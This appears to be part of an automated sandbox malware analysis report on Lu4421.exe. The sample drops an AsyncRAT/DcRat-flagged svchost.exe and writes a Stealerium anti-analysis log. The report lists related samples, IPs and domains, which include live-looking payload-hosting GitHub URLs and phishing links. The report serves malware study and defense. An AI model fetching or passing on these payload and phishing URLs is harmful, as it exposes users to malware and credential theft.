                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: Lu4421.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                06:07:19API Interceptor66x Sleep call for process: Lu4421.exe modified
                                                                                06:07:34API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                06:07:52API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                20.233.83.145Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                                • github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                github.comx0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 140.82.113.4
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 20.233.83.145
                                                                                ORDER-2412180Y6890PF57682456HTVC789378909759..jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                • 20.233.83.145
                                                                                IAK4Rn3bfO.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                • 20.233.83.145
                                                                                ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                • 140.82.121.3
                                                                                3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                • 140.82.113.4
                                                                                uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                • 20.233.83.145
                                                                                ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                                • 20.233.83.145
                                                                                3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                • 20.233.83.145
                                                                                c56uoWlDXp.exeGet hashmaliciousUnknownBrowse
                                                                                • 20.233.83.145
                                                                                raw.githubusercontent.comurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.109.133
                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.110.133
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 185.199.108.133
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 185.199.110.133
                                                                                rbqHSouklL.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.111.133
                                                                                stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.109.133
                                                                                mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                bg.microsoft.map.fastly.netdo.ps1Get hashmaliciousUnknownBrowse
                                                                                • 199.232.214.172
                                                                                Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
                                                                                • 199.232.210.172
                                                                                YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 199.232.210.172
                                                                                xxx.ps1Get hashmaliciousAsyncRATBrowse
                                                                                • 199.232.210.172
                                                                                KE2yNJdV55.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 199.232.210.172
                                                                                LA0gY3d103.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 199.232.210.172
                                                                                JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 199.232.214.172
                                                                                uzI7DAON53.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 199.232.210.172
                                                                                YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                • 199.232.210.172
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 199.232.214.172

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                OVHFRgaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                                • 54.37.137.114
                                                                                YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 139.99.188.124
                                                                                https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                • 167.114.27.228
                                                                                KE2yNJdV55.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 139.99.188.124
                                                                                LA0gY3d103.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 139.99.188.124
                                                                                JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 139.99.188.124
                                                                                uzI7DAON53.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 139.99.188.124
                                                                                YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                • 139.99.188.124
                                                                                4a5MWYOGVy.exeGet hashmaliciousPureCrypterBrowse
                                                                                • 139.99.188.124
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 139.99.188.124
                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUShttp://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                • 52.170.203.157
                                                                                EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                • 52.182.143.210
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 20.233.83.145
                                                                                https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4YGet hashmaliciousUnknownBrowse
                                                                                • 13.107.136.10
                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 21.50.39.179
                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 21.52.221.95
                                                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 137.117.24.119
                                                                                arm5.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 22.4.220.86
                                                                                arm.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 52.155.199.154
                                                                                arm7.nn-20241218-0633.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 22.29.180.219
                                                                                FASTLYUSdo.ps1Get hashmaliciousUnknownBrowse
                                                                                • 151.101.1.91
                                                                                http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                • 151.101.194.208
                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.109.133
                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.110.133
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 185.199.108.133
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 185.199.110.133
                                                                                http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                • 151.101.2.137
                                                                                ORDER-2412180Y6890PF57682456HTVC789378909759..jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                • 199.232.192.209
                                                                                Credit Card Authorization Form.pdfGet hashmaliciousUnknownBrowse
                                                                                • 151.101.129.229
                                                                                https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                • 151.101.1.229

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttp://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                Memo - Impairment Test 2023 MEX010B (5).jsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                PO 0309494059506060609696007.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145
                                                                                Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                • 185.199.108.133
                                                                                • 20.233.83.145

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Lu4421.exe_e89c6726561f71ab41431a3c6e42949dc982e4b6_2f8b0fe7_9c5a13bd-6112-4df9-ae06-7491d7fbbf43\Report.wer

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):1.3165879074051308
                                                                                Encrypted:false
                                                                                SSDEEP:192:Sy3e+KIwO0ODr09G0HgtjAiorPGl9Lq9pzuiFIZ24lO8+:m+FwOR89G0HgtjToE9LozuiFIY4lO8+
                                                                                MD5:8C61DFBA68C87AF1CC40C905A6060F68
                                                                                SHA1:CD9D7D2C6F819E3F27DBB81216DC50FE1C9B2D98
                                                                                SHA-256:C3A1F13235131D5E59EFF70440E5260D0F5CDB11205ABE0B8CFF49C37BD19218
                                                                                SHA-512:8A4BAE9D43FF98412AC3B87635777836C7EE2413C4B9AF31D05CAFDB72024764D08F871F4F14E043D8921FCC0AB27F80F8255048A5EA2E41F8E27C8492838792
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.3.6.4.7.6.9.1.0.2.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.3.6.4.9.1.9.1.0.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.5.a.1.3.b.d.-.6.1.1.2.-.4.d.f.9.-.a.e.0.6.-.7.4.9.1.d.7.f.b.b.f.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.9.b.d.0.6.3.-.5.9.5.2.-.4.2.b.a.-.8.1.9.3.-.4.1.7.2.7.0.8.c.7.b.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.L.u.4.4.2.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.0.-.0.0.0.1.-.0.0.1.4.-.9.d.4.9.-.6.f.0.0.3.d.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.8.2.7.c.9.8.c.8.c.9.9.3.e.9.2.1.3.7.2.1.7.d.0.2.e.c.5.b.3.9.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.1.1.4.c.0.5.9.f.e.d.0.8.a.5.0.1.c.3.4.4.f.4.0.d.9.f.7.0.2.f.0.3.c.d.e.b.b.a.b.!.L.u.4.4.2.1...e.x.e.....T.a.r.g.e.t.A.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER74C5.tmp.dmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 16 streams, Wed Dec 18 11:07:28 2024, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):938981
                                                                                Entropy (8bit):2.2810211413212906
                                                                                Encrypted:false
                                                                                SSDEEP:3072:zS4i9RbVMMPdh43+vm8cYzFYmt99L19+UGyxsaBl4M1/R/RVGs///AxcSe2x1CC/:O4ipVh43QDcYdUasaBl1dMfvq
                                                                                MD5:B339BA73D06AA5B8BDB0D91F98996A87
                                                                                SHA1:E85D190001EFF69287627299C339EABA879CDE19
                                                                                SHA-256:CB82751BBE20F590387F6C77AFC0B5ECB2AC193E2B6E6C3EA668D98EC82393E7
                                                                                SHA-512:D4ECE5C5A626799C42085729F77A0B723BD058621AD9549460DB2A6171E9E5DB8044741EDB8332F72FA011DDF9CD95CABB1861D0D96B5A8A226D9E24A859BDD3
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:MDMP..a..... ........bg............d...........$%..........$....5...........5......dY..fN..........l.......8...........T............s...............K..........|M..............................................................................eJ.......N......Lw......................T.......p....bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER79D7.tmp.WERInternalMetadata.xml

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8814
                                                                                Entropy (8bit):3.700836325279667
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJEDi6Y9LMkjsgmfZFzUyJprE89b9qb0f9tvnom:R6lXJwi6YhMYsgmfLzUy19qYf/t
                                                                                MD5:6F1CEE53AE6DE44F29C64CA473AED4E6
                                                                                SHA1:C2F0EA9B3976A6D7202F6CF4636931DC9D186A50
                                                                                SHA-256:E5B082EEA6E05BBFB70C58E2C39469AB194D4A3B9774176D2977DA7254D1CD3B
                                                                                SHA-512:0A8D444102DEC4526002472CD1036C460B84FD8A1869C0DE12C2CF2488392A327E281785B9FB40D21CC220F1E1910D6A49A8A86813EA5A6754C46D675D40D49A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.8.<./.P.i.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A07.tmp.xml

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4782
                                                                                Entropy (8bit):4.454922366753696
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zs4Jg771I9MXWpW8VYaYm8M4JCV6NPzyF0yq8vk6NPz11twU+ed:uIjf+I7Hm7VCJ5ZrW9ZJ1twUld
                                                                                MD5:9C4801D4A2C64E862CFD4D4043A99C66
                                                                                SHA1:223C18547016789C769B53496931A5188A13D614
                                                                                SHA-256:B80212A8115399C32CF336524B5DC337DF881E64EEB1354B8D9CA0C1F70A0029
                                                                                SHA-512:1E203382F02C0B9E2DD141B91CDB8466B06695917C5491769AAA590904A692D0DE6DD0248ACEEBD6484708CDA7CE9EABE05E1F6EBE4458343B19033814E136FB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                Category:dropped
                                                                                Size (bytes):71954
                                                                                Entropy (8bit):7.996617769952133
                                                                                Encrypted:true
                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.2418003062782916
                                                                                Encrypted:false
                                                                                SSDEEP:6:kK/8i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XMDImsLNkPlE99SNxAhUe/3
                                                                                MD5:7D4978EF9044BBE1214404E544BA9690
                                                                                SHA1:AA55A666AD0F53C537EDA72FF18DBB769BDE65CF
                                                                                SHA-256:C1DC771F0C46622028015053F737C9253E09987A7CD3441693299DFBAEC8AC6D
                                                                                SHA-512:00F6E139C91F90616F8B61B8DC1901FE432E50F0CCBB78BCDCA690BED05BC5EAF04181EB2E1DFC8562045861236D265DDF68647A0440BD4B2AF88134090F7B38
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:p...... ..........V.=Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                C:\Users\user\AppData\Local\Temp\Stealerium-Latest.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Lu4421.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):802
                                                                                Entropy (8bit):5.148231617209204
                                                                                Encrypted:false
                                                                                SSDEEP:12:oVRAF42pFDo+fTU29DmS7a3pa7/XhauWhakzXLhaZQhaW80A0Iu0j:oVmF4q6+fbdyGPHWpbgQW0A0IV
                                                                                MD5:2C667ACDF644153E839FF081C0A35066
                                                                                SHA1:27B633F592F18EC7693A9A919718E74E93F0196D
                                                                                SHA-256:7D969B74084B176757C20B95F2B5ACC279E450C9A5AF8F25D38EF835CA2C9AEA
                                                                                SHA-512:A4C9E37DB43DAA5364876A74A18C23EAF3F1FEAB5212EBC01F813425B89D162DF9CE0DF4D92DC3EEC2D42FF07A89168C07FAF42D1F0B1F8ADA1FAC223AA4E895
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:[2024-12-18 06:07:19.324] HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\267bb600791eee4c354dd856956b4399..[2024-12-18 06:09:48.289] AntiAnalysis: Successfully loaded 'PCNames' list with 230 entries...[2024-12-18 06:09:48.304] AntiAnalysis: Successfully loaded 'PCUsernames' list with 143 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'MachineGuids' list with 30 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'GPUs' list with 99 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'IPs' list with 203 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'Processes' list with 2 entries...[2024-12-18 06:20:01.395] AntiAnalysis: Failed to check IP addresses. Exception: No such host is known..

                                                                                C:\Users\user\AppData\Local\Temp\svchost.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Lu4421.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):65024
                                                                                Entropy (8bit):5.818068016613434
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ihbjnR1AioCzmUxIxqFaUm7wPeUJyq8wJGbbUwm/GMNpqKmY7:ihbjnR1AioCzmUxIxwaTwPeUw8GbbUxM
                                                                                MD5:67CA41C73D556CC4CFC67FC5B425BBBD
                                                                                SHA1:ADA7F812CD581C493630ECA83BF38C0F8B32B186
                                                                                SHA-256:23D2E491A8C7F2F7F344764E6879D9566C9A3E55A3788038E48B346C068DDE5B
                                                                                SHA-512:0DCEB6468147CD2497ADF31843389A78460ED5ABE2C5A13488FC55A2D202EE6CE0271821D3CF12BC1F09A4D6B79A737EA3BCCFC2BB87F89B3FFF6410FA85EC02
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 84%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.>g................................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........e..............................................................W......H3.......W......3........./.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(C......*2~.....oD...*.s....%rW..po....(h...r...p(....o....o....o....( ... ....(....*.s....%rW..po....r9..po....%r9..po.....o....o....( ...*Vs.........si........*.~"...*..."...*F.(+...~!...o....*&...o.

                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465566144997875
                                                                                Encrypted:false
                                                                                SSDEEP:6144:/IXfpi67eLPU9skLmb0b4jWSPKaJG8nAgejZMMhA2gX4WABl0uNydwBCswSbw:wXD94jWlLZMM6YFH4+w
